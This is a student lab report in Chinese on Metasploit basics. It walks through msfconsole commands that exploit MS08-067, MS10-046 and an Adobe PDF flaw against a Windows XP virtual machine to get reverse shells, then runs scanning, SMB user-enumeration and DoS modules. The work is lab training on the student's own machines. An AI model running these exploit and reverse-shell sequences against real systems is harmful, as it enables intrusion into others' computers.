1. 程式人生 > >20155232《網絡對抗》Exp5 MSF基礎應用

20155232《網絡對抗》Exp5 MSF基礎應用

機構 XP ID 格式 兔子 網段 打印機共享 tcp option

20155232《網絡對抗》Exp5 MSF基礎應用

基礎問題回答

用自己的話解釋什麽是exploit,payload,encode.

exploit:就是利用可能存在的漏洞對目標進行攻擊,相當於一個載具

payload:就是攻擊的代碼,是載荷。

encode:為了幫助攻擊載荷避免被殺軟發現,進行偽裝。

實踐總結與體會

在輔助模塊這裏,可以發現很多舊版本的軟件有漏洞,從而可以進行相關的攻擊,在此次實驗中就體驗了舊版本有漏洞的一些軟件進行了攻擊並且很輕易就實現了,所以有漏洞時,一定要盡快打補丁,不能讓別人有機可乘哈哈哈。。

離實戰還缺些什麽技術或步驟?

實戰的時候要結合靶機的具體環境考慮,結合具體應用的漏洞去實踐。

主動攻擊:ms08_067

windows ip :192.168.128.135
kali ip :192.168.128.133
實驗前先查看kali與靶機是否可以ping通
技術分享圖片

因為中文版虛擬機結果一直提示沒有建立會話,所以此次靶機為我拷的WinXPenSP3(將網絡調制NAT模式,否則ping不通啊)
技術分享圖片

  • 輸入

    msfconsole

    進入msf,首先使用search命令搜尋有關漏洞MS08_067的相關信息
    技術分享圖片

  • use exploit/windows/smb/ms08_067_netapi
    使用該模塊:
  • 再使用

    show payloads

查看可以供我們使用的payload:

技術分享圖片

  • show targets
  • 查看可以被攻擊的靶機的操作系統型號,這裏我們默認選擇0采用自動選取
    技術分享圖片

  • 接下來設置攻擊有效載荷(set payload generic/shell_reverse_tcp)
    我們的目的是為了獲取靶機的shell,因此這裏我們選擇通過反向連接來獲取shell的

    generic/shell_reverse_tcp

    當payload,使用指令

    set payload generic/shell_reverse_tcp

    對payload進行設置:
    技術分享圖片

  • 使用指令

    show options

    查看我們需要設置的參數,發現需要設置一個

    RHOST

    (遠程主機,即靶機的IP地址)和一個

    LHOST

    (本地主機,即攻擊機的IP地址):

技術分享圖片

  • 設置完相應的參數後,再次使用
show options

對攻擊的選項進行查看:
技術分享圖片

問題:

  • 接著使用

    exploit

    指令開始攻擊,出現下圖中錯誤:
    技術分享圖片

解決:

  • 將xp中的防火墻關閉:
    技術分享圖片

攻擊成功後獲取了靶機的shell,使用

systeminfo

指令查看靶機系統信息:
技術分享圖片

技術分享圖片

  • 在kali上執行

    ipconfig/all

    得到如下圖所示:

技術分享圖片

IE瀏覽器滲透攻擊——ms10_046安全漏洞

  • 基本步驟還是和上面一樣,先利用

    search ms10_046

    指令查看可以運用的攻擊模塊:

技術分享圖片

  • 使用命令,選取模塊
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

使用指令

set payload generic/shell_reverse_tcp

對payload進行設置:

技術分享圖片

再輸入命令

show options
  • 然後查看需要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,所以這裏SRVHOST和LHOST都應該填攻擊機的IP地址:

技術分享圖片

  • 進行設置並且查看:

技術分享圖片

技術分享圖片

  • 使用

    exploit

    指令執行漏洞,可以看到生成了一個url:
    技術分享圖片

  • 在靶機的IE瀏覽器上使用該url進行訪問,在MSF終端看見提示404錯誤

技術分享圖片

技術分享圖片

技術分享圖片

問題

  • 用靶機訪問時,結果彈出了這個

技術分享圖片

在更改相關設置多次還是不行。。。。
並且提示錯誤:

ip被占用

技術分享圖片

解決

所以在網上搜索如何修改主機ip地址:

使用命令

ifconfig eth0 192.168.128.132   (自己要設置的IP)

這個命令是更改主機IP,回車後你什麽都看不到,就表示成功了,但是此命令所做的更改在下次重啟後就會失效。

技術分享圖片

                      [參考錯誤信息](https://yq.aliyun.com/articles/366803)

在進行如上設置後還是出現錯誤:
技術分享圖片

在重新進行設置後,不設置修改端口好像就成功了???
技術分享圖片

  • 使用

    sessions -i 1

    接入ID為1的活動鏈接

技術分享圖片

  • 使用
ipconfig

命令

技術分享圖片

已成功獲取了靶機的shell,再利用systeminfo指令查看靶機的系統信息:
技術分享圖片

技術分享圖片

針對客戶端的攻擊

  • search adobe

    查詢一下針對該漏洞的攻擊模塊:

技術分享圖片

  • 選擇了rank為good這款:

技術分享圖片

  • 輸入命令

    use exploit/windows/fileformat/adobe_utilprintf

    進入該漏洞模塊的使用
    技術分享圖片

  • 使用命令

    set payload windows/meterpreter/reverse_tcp

    設置攻擊有效載荷。

  • 輸入命令

    show options

    顯示我們需要在攻擊前需要設置的數據
    技術分享圖片

  • 輸入

    exploit

    ,生成pdf文件,並可以看到pdf所在文件夾,將pdf復制到靶機裏。
    技術分享圖片

技術分享圖片

  • 粘貼到xp中:

技術分享圖片

  • 使用

    use exploit/multi/handler

    新建一個監聽模塊

  • 使用

    set payloads windws/meterpreter/reverse_tcp

    建立一個反向連接,設置set LPORT 5232

技術分享圖片

  • 使用命令

    exploit

    開始攻擊,在xp中打開pdf。同時kali會顯示連接成功的結果。
    技術分享圖片

  • 輸入shell獲取靶機信息

技術分享圖片

  • 在靶機xp中使用命令netstat -an,看本地tcp連接。
    技術分享圖片

輔助模塊應用

開放端口掃描

  • 使用

    show auxiliary

    查看可以運用的輔助模塊:
    技術分享圖片

  • 使用此模塊掃描端口

    use auxiliary/scanner/portscan/syn
  • 使用命令

    show options
    set RHOSTS 192.168.128.136(目標)
    set THREADS 50(線程)
    exploit

技術分享圖片

技術分享圖片

監聽結果顯示:

技術分享圖片

上網搜索了一下都是開放的什麽端口:

135端口 :
Microsoft在這個端口運行DCE RPC end-point mapper為它的DCOM服務。這與UNIX 111端口的功能很相似。使用DCOM和RPC的服務利用計算機上的end-point mapper註冊它們的位置。遠端客戶連接到計算機時,它們查找end-point mapper找到服務的位置。

139端口:
139 NetBIOS File and Print Sharing 通過這個端口進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於Windows"文件和打印機共享"和SAMBA。在Internet上共享自己的硬盤可能是最常見的問題。139屬於TCP協議。

445端口 :
445端口是一個毀譽參半的端口,有了它我們可以在局域網中輕松訪問各種共享文件夾或共享打印機,但也正是因為有了它,黑客們才有了可乘之機,他們能通過該端口偷偷共享你的硬盤,甚至會在悄無聲息中將你的硬盤格式化掉! 2017年10月,由於病毒“壞兔子”來襲,國家互聯網應急中心等安全機構建議用戶及時關閉計算機以及網絡設備上的445和139端口

枚舉系統上的用戶

模塊:auxiliary/scanner/smb/smb_enumusers

功能:枚舉系統上的用戶

使用命令:

use auxiliary/scanner/smb/smb_enumusers

技術分享圖片

進行設置:
技術分享圖片

然後就可以開始exploit了。

技術分享圖片

cert掃描

用途:可以查到一個子網段內的服務器的證書情況。
這是用於掃描ssl證書的,ssl安全連接需要身份認證——數字證書

使用命令

use auxiliary/scanner/http/cert

進行相關設置
技術分享圖片

掃描結果:
技術分享圖片

MS02 _ 063 _ pptp_dos

技術分享圖片

這是Windows 2000/XP中PPTP服務的拒絕服務攻擊缺陷。
攻擊者利用此缺陷僅僅能夠進行拒絕服務攻擊,並不能獲得任何信息和任何權限。

使用use使用此模塊:
技術分享圖片

進行配置:
技術分享圖片

exploit看看效果:竟然被拒絕了。。。
上網查了一下一般這中情況是因為沒有關閉防火墻,但是檢查後防火墻時關閉的狀態,以失敗告終。。。。。
技術分享圖片

arp_sweep

arp_sweep使用ARP請求枚舉本地局域網絡中的所有活躍主機進行掃描。進入模塊後查詢一下參數,

msf > use auxiliary/scanner/discovery/arp_sweep   ---進入arp_sweep 模塊
msf auxiliary(arp_sweep) > show options  ---查詢模塊參數

並且配置好後進行exploit:
技術分享圖片

技術分享圖片

技術分享圖片

因為打開了win xp和虛擬機kali,掃描到了好幾個活躍機,

發現xp的ip地址是:
192.168.128.138

然後我自己主機的ip地址是
192.168.128.1

但是還有兩個活躍機的地址不知道是誰的= =。哈哈哈哈

技術分享圖片

技術分享圖片

20155232《網絡對抗》Exp5 MSF基礎應用